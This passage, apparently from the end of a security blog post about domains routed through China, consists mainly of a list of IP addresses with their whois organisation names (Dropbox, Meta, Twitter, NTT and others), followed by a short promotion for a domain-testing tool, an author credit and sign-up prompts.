108.160.166.142 OrgName: Dropbox, Inc.
108.160.166.148 OrgName: Dropbox, Inc.
108.160.166.253 OrgName: Dropbox, Inc.
108.160.166.42 OrgName: Dropbox, Inc.
108.160.166.49 OrgName: Dropbox, Inc.
108.160.166.57 OrgName: Dropbox, Inc.
108.160.166.61 OrgName: Dropbox, Inc.
108.160.166.62 OrgName: Dropbox, Inc.
108.160.166.9 OrgName: Dropbox, Inc.
108.160.167.147 OrgName: Dropbox, Inc.
108.160.167.148 OrgName: Dropbox, Inc.
108.160.167.156 OrgName: Dropbox, Inc.
108.160.167.158 OrgName: Dropbox, Inc.
108.160.167.159 OrgName: Dropbox, Inc.
108.160.167.165 OrgName: Dropbox, Inc.
108.160.167.167 OrgName: Dropbox, Inc.
108.160.167.174 OrgName: Dropbox, Inc.
108.160.167.30 OrgName: Dropbox, Inc.
108.160.169.171 OrgName: Dropbox, Inc.
108.160.169.174 OrgName: Dropbox, Inc.
108.160.169.175 OrgName: Dropbox, Inc.
108.160.169.178 OrgName: Dropbox, Inc.
108.160.169.179 OrgName: Dropbox, Inc.
108.160.169.181 OrgName: Dropbox, Inc.
108.160.169.185 OrgName: Dropbox, Inc.
108.160.169.186 OrgName: Dropbox, Inc.
108.160.169.37 OrgName: Dropbox, Inc.
108.160.169.46 OrgName: Dropbox, Inc.
108.160.169.54 OrgName: Dropbox, Inc.
108.160.169.55 OrgName: Dropbox, Inc.
108.160.170.26 OrgName: Dropbox, Inc.
108.160.170.33 OrgName: Dropbox, Inc.
108.160.170.39 OrgName: Dropbox, Inc.
108.160.170.41 OrgName: Dropbox, Inc.
108.160.170.43 OrgName: Dropbox, Inc.
108.160.170.44 OrgName: Dropbox, Inc.
108.160.170.45 OrgName: Dropbox, Inc.
108.160.170.52 OrgName: Dropbox, Inc.
108.160.172.1 OrgName: Dropbox, Inc.
108.160.172.200 OrgName: Dropbox, Inc.
108.160.172.204 OrgName: Dropbox, Inc.
108.160.172.208 OrgName: Dropbox, Inc.
108.160.172.232 OrgName: Dropbox, Inc.
108.160.173.207 OrgName: Dropbox, Inc.
111.243.214.169
114.43.24.59
115.126.100.160
116.89.243.8 org-name: Zhengzhou NiPaiYi network of science and Technology Co., Ltd.
118.107.180.216
118.184.26.113
118.184.78.78
118.193.202.219
118.193.240.37
118.193.240.41
119.28.87.227
122.10.85.4
122.248.226.57
124.11.210.175
128.121.146.101 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.121.146.109 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.121.146.228 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.121.146.235 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.121.243.106 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.121.243.107 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.121.243.228 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.121.243.235 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.121.243.75 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.121.243.76 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.121.243.77 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.117 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.125 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.149 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.155 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.157 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.180 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.189 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.20 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.212 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.218 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.221 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.244 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.253 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.29 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.59 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.61 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.85 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.91 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.240.93 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.245.125 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.245.157 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.245.180 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.245.189 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.245.212 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.245.221 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.245.244 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.245.253 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.245.29 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.245.43 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.245.93 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.250.148 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.250.155 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
128.242.250.157 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
130.211.15.150 OrgName: Google LLC
148.163.48.215 OrgName: Input Output Flood LLC
150.107.3.176
154.83.14.134
154.83.15.20
154.83.15.45
154.85.102.30
154.85.102.32
154.92.16.97
156.233.67.243 OrgName: African Network Information Center
157.240.0.18 OrgName: Facebook, Inc.
157.240.0.35 OrgName: Facebook, Inc.
157.240.1.33 OrgName: Facebook, Inc.
157.240.1.50 OrgName: Facebook, Inc.
157.240.1.9 OrgName: Facebook, Inc.
157.240.10.32 OrgName: Facebook, Inc.
157.240.10.36 OrgName: Facebook, Inc.
157.240.10.41 OrgName: Facebook, Inc.
157.240.11.40 OrgName: Facebook, Inc.
157.240.12.35 OrgName: Facebook, Inc.
157.240.12.36 OrgName: Facebook, Inc.
157.240.12.5 OrgName: Facebook, Inc.
157.240.12.50 OrgName: Facebook, Inc.
157.240.13.8 OrgName: Facebook, Inc.
157.240.15.8 OrgName: Facebook, Inc.
157.240.16.50 OrgName: Facebook, Inc.
157.240.17.14 OrgName: Facebook, Inc.
157.240.17.35 OrgName: Facebook, Inc.
157.240.17.36 OrgName: Facebook, Inc.
157.240.17.41 OrgName: Facebook, Inc.
157.240.18.18 OrgName: Facebook, Inc.
157.240.2.14 OrgName: Facebook, Inc.
157.240.2.36 OrgName: Facebook, Inc.
157.240.2.50 OrgName: Facebook, Inc.
157.240.20.18 OrgName: Facebook, Inc.
157.240.20.8 OrgName: Facebook, Inc.
157.240.21.9 OrgName: Facebook, Inc.
157.240.3.50 OrgName: Facebook, Inc.
157.240.3.8 OrgName: Facebook, Inc.
157.240.6.35 OrgName: Facebook, Inc.
157.240.7.5 OrgName: Facebook, Inc.
157.240.7.8 OrgName: Facebook, Inc.
157.240.8.36 OrgName: Facebook, Inc.
157.240.8.41 OrgName: Facebook, Inc.
157.240.8.50 OrgName: Facebook, Inc.
157.240.9.36 OrgName: Facebook, Inc.
159.106.121.75 OrgName: DoD Network Information Center
159.138.20.20 OrgName: Asia Pacific Network Information Centre
159.65.107.38 OrgName: DigitalOcean, LLC
162.125.1.8 OrgName: Dropbox, Inc.
162.125.17.131 OrgName: Dropbox, Inc.
162.125.18.129 OrgName: Dropbox, Inc.
162.125.18.133 OrgName: Dropbox, Inc.
162.125.2.3 OrgName: Dropbox, Inc.
162.125.2.5 OrgName: Dropbox, Inc.
162.125.2.6 OrgName: Dropbox, Inc.
162.125.32.10 OrgName: Dropbox, Inc.
162.125.32.12 OrgName: Dropbox, Inc.
162.125.32.13 OrgName: Dropbox, Inc.
162.125.32.15 OrgName: Dropbox, Inc.
162.125.32.2 OrgName: Dropbox, Inc.
162.125.32.5 OrgName: Dropbox, Inc.
162.125.32.6 OrgName: Dropbox, Inc.
162.125.32.9 OrgName: Dropbox, Inc.
162.125.34.133 OrgName: Dropbox, Inc.
162.125.6.1 OrgName: Dropbox, Inc.
162.125.7.1 OrgName: Dropbox, Inc.
162.125.8.1 OrgName: Dropbox, Inc.
162.125.80.3 OrgName: Dropbox, Inc.
162.125.80.5 OrgName: Dropbox, Inc.
162.125.80.6 OrgName: Dropbox, Inc.
162.125.82.7 OrgName: Dropbox, Inc.
162.125.83.1 OrgName: Dropbox, Inc.
162.220.12.226 OrgName: QuadraNet Enterprises LLC
168.143.162.42 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
168.143.162.58 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
168.143.171.154 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
168.143.171.186 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
168.143.171.189 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
168.143.171.93 OrgName: NTT America, Inc.
network:Org-Name:NTT America Enterprise Hosting - San Jose
173.208.182.68 OrgName: WholeSale Internet, Inc.
173.231.12.107 whois: connect(): Operation timed out
OrgName: WebNX, Inc.
173.234.53.168 OrgName: Leaseweb USA, Inc.
173.236.182.137 OrgName: New Dream Network, LLC
173.236.212.42 OrgName: New Dream Network, LLC
173.244.209.150 OrgName: Hosting Services, Inc.
173.244.217.42 OrgName: Hosting Services, Inc.
173.252.105.21 OrgName: Facebook, Inc.
173.252.108.21 OrgName: Facebook, Inc.
173.252.108.3 OrgName: Facebook, Inc.
173.252.248.244 OrgName: Take 2 Hosting, Inc.
173.252.88.133 OrgName: Facebook, Inc.
173.252.88.67 OrgName: Facebook, Inc.
173.255.209.47 OrgName: Akamai Technologies, Inc.
173.255.213.90 OrgName: Akamai Technologies, Inc.
174.36.196.242 OrgName: SoftLayer Technologies Inc.
174.36.228.136 OrgName: SoftLayer Technologies Inc.
174.37.154.236 OrgName: SoftLayer Technologies Inc.
174.37.175.229 OrgName: SoftLayer Technologies Inc.
174.37.243.85 OrgName: SoftLayer Technologies Inc.
174.37.54.20 OrgName: SoftLayer Technologies Inc.
179.60.193.16
179.60.193.9
182.50.139.56 org-name: Godaddy.com
184.173.136.86 OrgName: SoftLayer Technologies Inc.
184.72.1.148 OrgName: Amazon.com, Inc.
185.45.6.103 org-name: TWITTER INTERNATIONAL UNLIMITED COMPANY
185.45.6.57 org-name: TWITTER INTERNATIONAL UNLIMITED COMPANY
185.45.7.165 org-name: TWITTER INTERNATIONAL UNLIMITED COMPANY
185.45.7.185 org-name: TWITTER INTERNATIONAL UNLIMITED COMPANY
185.45.7.189 org-name: TWITTER INTERNATIONAL UNLIMITED COMPANY
185.45.7.97 org-name: TWITTER INTERNATIONAL UNLIMITED COMPANY
185.60.216.11 org-name: META PLATFORMS IRELAND LIMITED
185.60.216.169 org-name: META PLATFORMS IRELAND LIMITED
185.60.216.36 org-name: META PLATFORMS IRELAND LIMITED
185.60.216.50 org-name: META PLATFORMS IRELAND LIMITED
185.60.218.50 org-name: META PLATFORMS IRELAND LIMITED
185.60.219.36 org-name: META PLATFORMS IRELAND LIMITED
185.60.219.41 org-name: META PLATFORMS IRELAND LIMITED
192.133.77.133 OrgName: Twitter Inc.
192.133.77.145 OrgName: Twitter Inc.
192.133.77.189 OrgName: Twitter Inc.
192.133.77.191 OrgName: Twitter Inc.
192.133.77.197 OrgName: Twitter Inc.
192.133.77.59 OrgName: Twitter Inc.
198.27.124.186 OrgName: OVH Hosting, Inc.
198.44.185.131 OrgName: VpsQuan L.L.C.
199.16.156.103 OrgName: Twitter Inc.
199.16.156.11 OrgName: Twitter Inc.
199.16.156.38 OrgName: Twitter Inc.
199.16.156.39 OrgName: Twitter Inc.
199.16.156.40 OrgName: Twitter Inc.
199.16.156.7 OrgName: Twitter Inc.
199.16.156.71 OrgName: Twitter Inc.
199.16.156.75 OrgName: Twitter Inc.
199.16.158.104 OrgName: Twitter Inc.
199.16.158.12 OrgName: Twitter Inc.
199.16.158.182 OrgName: Twitter Inc.
199.16.158.190 OrgName: Twitter Inc.
199.16.158.8 OrgName: Twitter Inc.
199.16.158.9 OrgName: Twitter Inc.
199.193.116.105 OrgName: HIVELOCITY, Inc.
network:Org-Name:Private Customer
199.59.148.102 OrgName: Twitter Inc.
199.59.148.106 OrgName: Twitter Inc.
199.59.148.147 OrgName: Twitter Inc.
199.59.148.15 OrgName: Twitter Inc.
199.59.148.20 OrgName: Twitter Inc.
199.59.148.201 OrgName: Twitter Inc.
199.59.148.202 OrgName: Twitter Inc.
199.59.148.206 OrgName: Twitter Inc.
199.59.148.209 OrgName: Twitter Inc.
199.59.148.222 OrgName: Twitter Inc.
199.59.148.229 OrgName: Twitter Inc.
199.59.148.246 OrgName: Twitter Inc.
199.59.148.247 OrgName: Twitter Inc.
199.59.148.6 OrgName: Twitter Inc.
199.59.148.7 OrgName: Twitter Inc.
199.59.148.8 OrgName: Twitter Inc.
199.59.148.89 OrgName: Twitter Inc.
199.59.148.9 OrgName: Twitter Inc.
199.59.148.96 OrgName: Twitter Inc.
199.59.148.97 OrgName: Twitter Inc.
199.59.149.136 OrgName: Twitter Inc.
199.59.149.201 OrgName: Twitter Inc.
199.59.149.202 OrgName: Twitter Inc.
199.59.149.203 OrgName: Twitter Inc.
199.59.149.204 OrgName: Twitter Inc.
199.59.149.205 OrgName: Twitter Inc.
199.59.149.206 OrgName: Twitter Inc.
199.59.149.207 OrgName: Twitter Inc.
199.59.149.208 OrgName: Twitter Inc.
199.59.149.210 OrgName: Twitter Inc.
199.59.149.230 OrgName: Twitter Inc.
199.59.149.231 OrgName: Twitter Inc.
199.59.149.232 OrgName: Twitter Inc.
199.59.149.234 OrgName: Twitter Inc.
199.59.149.235 OrgName: Twitter Inc.
199.59.149.236 OrgName: Twitter Inc.
199.59.149.237 OrgName: Twitter Inc.
199.59.149.238 OrgName: Twitter Inc.
199.59.149.239 OrgName: Twitter Inc.
199.59.149.244 OrgName: Twitter Inc.
199.59.150.12 OrgName: Twitter Inc.
199.59.150.13 OrgName: Twitter Inc.
199.59.150.39 OrgName: Twitter Inc.
199.59.150.40 OrgName: Twitter Inc.
199.59.150.43 OrgName: Twitter Inc.
199.59.150.44 OrgName: Twitter Inc.
199.59.150.45 OrgName: Twitter Inc.
199.59.150.49 OrgName: Twitter Inc.
199.96.58.105 OrgName: Twitter Inc.
199.96.58.15 OrgName: Twitter Inc.
199.96.58.157 OrgName: Twitter Inc.
199.96.58.177 OrgName: Twitter Inc.
199.96.58.85 OrgName: Twitter Inc.
199.96.59.19 OrgName: Twitter Inc.
199.96.59.61 OrgName: Twitter Inc.
199.96.59.95 OrgName: Twitter Inc.
199.96.61.1 OrgName: Twitter Inc.
199.96.62.17 OrgName: Twitter Inc.
199.96.62.21 OrgName: Twitter Inc.
199.96.62.41 OrgName: Twitter Inc.
199.96.62.75 OrgName: Twitter Inc.
199.96.63.163 OrgName: Twitter Inc.
199.96.63.177 OrgName: Twitter Inc.
199.96.63.53 OrgName: Twitter Inc.
199.96.63.75 OrgName: Twitter Inc.
202.160.128.14 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.128.16 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.128.195 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.128.203 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.128.205 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.128.210 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.128.238 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.128.40 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.128.96 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.129.164 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.129.36 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.129.37 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.129.6 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.130.117 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.130.118 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.130.145 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.130.52 org-name: Twitter Asia Pacific Pte. Ltd.
202.160.130.66 org-name: Twitter Asia Pacific Pte. Ltd.
202.182.98.125
202.53.137.209
203.111.254.117
204.79.197.217 OrgName: Microsoft Corporation
205.186.152.122 OrgName: GoDaddy.com, LLC
208.101.21.43 OrgName: SoftLayer Technologies Inc.
208.101.60.87 OrgName: SoftLayer Technologies Inc.
208.31.254.33 OrgName: Sprint
208.43.170.231 OrgName: SoftLayer Technologies Inc.
208.43.237.140 OrgName: SoftLayer Technologies Inc.
208.77.47.172 whois: connect(): Operation timed out
OrgName: DCS Pacific Star, LLC
209.95.56.60 OrgName: Hosting Services, Inc.
210.209.84.142
210.56.51.192
210.56.51.193
211.104.160.39
23.101.24.70 OrgName: Microsoft Corporation
23.225.141.210 OrgName: CloudRadium L.L.C
23.234.30.58 OrgName: Defender cloud international llc
31.13.106.4 org-name: META PLATFORMS IRELAND LIMITED
31.13.112.4 org-name: META PLATFORMS IRELAND LIMITED
31.13.112.9 org-name: META PLATFORMS IRELAND LIMITED
31.13.64.7 org-name: META PLATFORMS IRELAND LIMITED
31.13.67.19 org-name: META PLATFORMS IRELAND LIMITED
31.13.67.33 org-name: META PLATFORMS IRELAND LIMITED
31.13.67.41 org-name: META PLATFORMS IRELAND LIMITED
31.13.68.169 org-name: META PLATFORMS IRELAND LIMITED
31.13.69.169 org-name: META PLATFORMS IRELAND LIMITED
31.13.69.245 org-name: META PLATFORMS IRELAND LIMITED
31.13.70.13 org-name: META PLATFORMS IRELAND LIMITED
31.13.70.33 org-name: META PLATFORMS IRELAND LIMITED
31.13.70.9 org-name: META PLATFORMS IRELAND LIMITED
31.13.71.19 org-name: META PLATFORMS IRELAND LIMITED
31.13.73.169 org-name: META PLATFORMS IRELAND LIMITED
31.13.73.9 org-name: META PLATFORMS IRELAND LIMITED
31.13.75.12 org-name: META PLATFORMS IRELAND LIMITED
31.13.75.5 org-name: META PLATFORMS IRELAND LIMITED
31.13.76.65 org-name: META PLATFORMS IRELAND LIMITED
31.13.76.99 org-name: META PLATFORMS IRELAND LIMITED
31.13.80.169 org-name: META PLATFORMS IRELAND LIMITED
31.13.80.37 org-name: META PLATFORMS IRELAND LIMITED
31.13.80.54 org-name: META PLATFORMS IRELAND LIMITED
31.13.81.4 org-name: META PLATFORMS IRELAND LIMITED
31.13.82.169 org-name: META PLATFORMS IRELAND LIMITED
31.13.82.33 org-name: META PLATFORMS IRELAND LIMITED
31.13.83.2 org-name: META PLATFORMS IRELAND LIMITED
31.13.83.34 org-name: META PLATFORMS IRELAND LIMITED
31.13.84.2 org-name: META PLATFORMS IRELAND LIMITED
31.13.84.34 org-name: META PLATFORMS IRELAND LIMITED
31.13.85.169 org-name: META PLATFORMS IRELAND LIMITED
31.13.85.2 org-name: META PLATFORMS IRELAND LIMITED
31.13.85.34 org-name: META PLATFORMS IRELAND LIMITED
31.13.85.53 org-name: META PLATFORMS IRELAND LIMITED
31.13.86.21 org-name: META PLATFORMS IRELAND LIMITED
31.13.87.19 org-name: META PLATFORMS IRELAND LIMITED
31.13.87.33 org-name: META PLATFORMS IRELAND LIMITED
31.13.87.34 org-name: META PLATFORMS IRELAND LIMITED
31.13.87.9 org-name: META PLATFORMS IRELAND LIMITED
31.13.88.169 org-name: META PLATFORMS IRELAND LIMITED
31.13.88.26 org-name: META PLATFORMS IRELAND LIMITED
31.13.90.19 org-name: META PLATFORMS IRELAND LIMITED
31.13.90.33 org-name: META PLATFORMS IRELAND LIMITED
31.13.91.33 org-name: META PLATFORMS IRELAND LIMITED
31.13.91.6 org-name: META PLATFORMS IRELAND LIMITED
31.13.92.5 org-name: META PLATFORMS IRELAND LIMITED
31.13.94.10 org-name: META PLATFORMS IRELAND LIMITED
31.13.94.23 org-name: META PLATFORMS IRELAND LIMITED
31.13.94.36 org-name: META PLATFORMS IRELAND LIMITED
31.13.94.37 org-name: META PLATFORMS IRELAND LIMITED
31.13.94.41 org-name: META PLATFORMS IRELAND LIMITED
31.13.94.49 org-name: META PLATFORMS IRELAND LIMITED
31.13.94.7 org-name: META PLATFORMS IRELAND LIMITED
31.13.95.169 org-name: META PLATFORMS IRELAND LIMITED
31.13.95.17 org-name: META PLATFORMS IRELAND LIMITED
31.13.95.18 org-name: META PLATFORMS IRELAND LIMITED
31.13.95.33 org-name: META PLATFORMS IRELAND LIMITED
31.13.95.34 org-name: META PLATFORMS IRELAND LIMITED
31.13.95.35 org-name: META PLATFORMS IRELAND LIMITED
31.13.95.37 org-name: META PLATFORMS IRELAND LIMITED
31.13.95.38 org-name: META PLATFORMS IRELAND LIMITED
31.13.95.48 org-name: META PLATFORMS IRELAND LIMITED
31.13.96.192 org-name: META PLATFORMS IRELAND LIMITED
31.13.96.193 org-name: META PLATFORMS IRELAND LIMITED
31.13.96.194 org-name: META PLATFORMS IRELAND LIMITED
31.13.96.195 org-name: META PLATFORMS IRELAND LIMITED
31.13.96.208 org-name: META PLATFORMS IRELAND LIMITED
38.121.72.166 OrgName: PSINet, Inc.
39.109.122.128 org-name: YISU CLOUD LIMITED
4.78.139.50 OrgName: Level 3 Parent, LLC
4.78.139.54 OrgName: Level 3 Parent, LLC
43.226.16.8 org-name: HONG KONG WAN SHOU NETWORK TECHNOLOGY LIMITED
45.114.11.238 OrgName: RIPE Network Coordination Centre
org-name: IP Resources Trading SRL
45.114.11.25 OrgName: RIPE Network Coordination Centre
org-name: IP Resources Trading SRL
45.77.186.255 OrgName: The Constant Company, LLC
47.88.58.234 OrgName: Alibaba Cloud LLC
50.117.117.42 OrgName: EGIHosting
50.23.209.199 OrgName: SoftLayer Technologies Inc.
50.87.93.246 OrgName: Unified Layer
52.175.9.80 OrgName: Microsoft Corporation
52.58.1.161 OrgName: Amazon Technologies Inc.
54.234.18.200 OrgName: Amazon Technologies Inc.
54.89.135.129 OrgName: Amazon Technologies Inc.
59.188.250.54
59.24.3.173
64.13.192.74 OrgName: GoDaddy.com, LLC
64.13.192.76 OrgName: GoDaddy.com, LLC
65.49.26.97 OrgName: Hurricane Electric LLC
65.49.26.98 OrgName: Hurricane Electric LLC
65.49.26.99 1`2`3OrgName: Hurricane Electric LLC
65.49.68.152 OrgName: Hurricane Electric LLC
66.220.146.94 OrgName: Facebook, Inc.
66.220.147.11 OrgName: Facebook, Inc.
66.220.148.145 OrgName: Facebook, Inc.
66.220.149.18 OrgName: Facebook, Inc.
66.220.149.32 OrgName: Facebook, Inc.
67.15.100.252 OrgName: SoftLayer Technologies Inc.
67.15.129.210 OrgName: SoftLayer Technologies Inc.
67.228.102.32 OrgName: SoftLayer Technologies Inc.
67.228.235.91 OrgName: SoftLayer Technologies Inc.
67.228.235.93 OrgName: SoftLayer Technologies Inc.
67.230.169.182 OrgName: Cluster Logic Inc
69.162.134.178 OrgName: Steadfast
network:Org-Name:BigScoots, INC.
69.171.224.36 OrgName: Facebook, Inc.
69.171.224.40 OrgName: Facebook, Inc.
69.171.227.37 OrgName: Facebook, Inc.
69.171.228.74 OrgName: Facebook, Inc.
69.171.229.11 OrgName: Facebook, Inc.
69.171.229.73 OrgName: Facebook, Inc.
69.171.234.48 OrgName: Facebook, Inc.
69.171.242.11 OrgName: Facebook, Inc.
69.171.247.32 OrgName: Facebook, Inc.
69.171.247.71 OrgName: Facebook, Inc.
69.197.153.180 OrgName: WholeSale Internet, Inc.
69.30.25.21 OrgName: Digital Fortress
69.50.221.20 OrgName: atjeu publishing, llc
69.63.176.143 OrgName: Facebook, Inc.
69.63.176.15 OrgName: Facebook, Inc.
69.63.176.59 OrgName: Facebook, Inc.
69.63.178.13 OrgName: Facebook, Inc.
69.63.180.173 OrgName: Facebook, Inc.
69.63.181.12 OrgName: Facebook, Inc.
69.63.184.14 OrgName: Facebook, Inc.
69.63.184.142 OrgName: Facebook, Inc.
69.63.184.30 OrgName: Facebook, Inc.
69.63.186.30 OrgName: Facebook, Inc.
69.63.186.31 OrgName: Facebook, Inc.
69.63.187.12 OrgName: Facebook, Inc.
69.63.190.26 OrgName: Facebook, Inc.
74.86.118.24 OrgName: SoftLayer Technologies Inc.
74.86.12.172 OrgName: SoftLayer Technologies Inc.
74.86.12.173 OrgName: SoftLayer Technologies Inc.
74.86.142.55 OrgName: SoftLayer Technologies Inc.
74.86.151.162 OrgName: SoftLayer Technologies Inc.
74.86.151.167 OrgName: SoftLayer Technologies Inc.
74.86.17.48 OrgName: SoftLayer Technologies Inc.
74.86.226.234 OrgName: SoftLayer Technologies Inc.
74.86.228.110 OrgName: SoftLayer Technologies Inc.
74.86.3.208 OrgName: SoftLayer Technologies Inc.
75.126.115.192 OrgName: SoftLayer Technologies Inc.
75.126.124.162 OrgName: SoftLayer Technologies Inc.
75.126.135.131 OrgName: SoftLayer Technologies Inc.
75.126.150.210 OrgName: SoftLayer Technologies Inc.
75.126.164.178 OrgName: SoftLayer Technologies Inc.
75.126.33.156 OrgName: SoftLayer Technologies Inc.
80.87.199.46 org-name: JSC "Server"
88.191.249.182
88.191.249.183
93.179.102.140 OrgName: Cluster Logic Inc
96.44.137.28 OrgName: QuadraNet Enterprises LLC
network:Org-Name:Xlitt Internal - Networking
98.159.108.57 OrgName: IDC, Inc
98.159.108.58 OrgName: IDC, Inc
98.159.108.61 OrgName: IDC, Inc
98.159.108.71 OrgName: IDC, Inc
Testing Tool
Do you have any domains that are being routed through China that you want to test?
Enter in the domain you would like to test, i.e. domain.cn, and we will let you know if it's vulnerable to the attack vectors in this blog post.
Written by:
Shubham Shah
Your subscription could not be saved. Please try again.
Get on a call with our team and learn how Assetnote can change the way you secure your attack surface. We'll set you up with a trial instance so you can see the impact for yourself.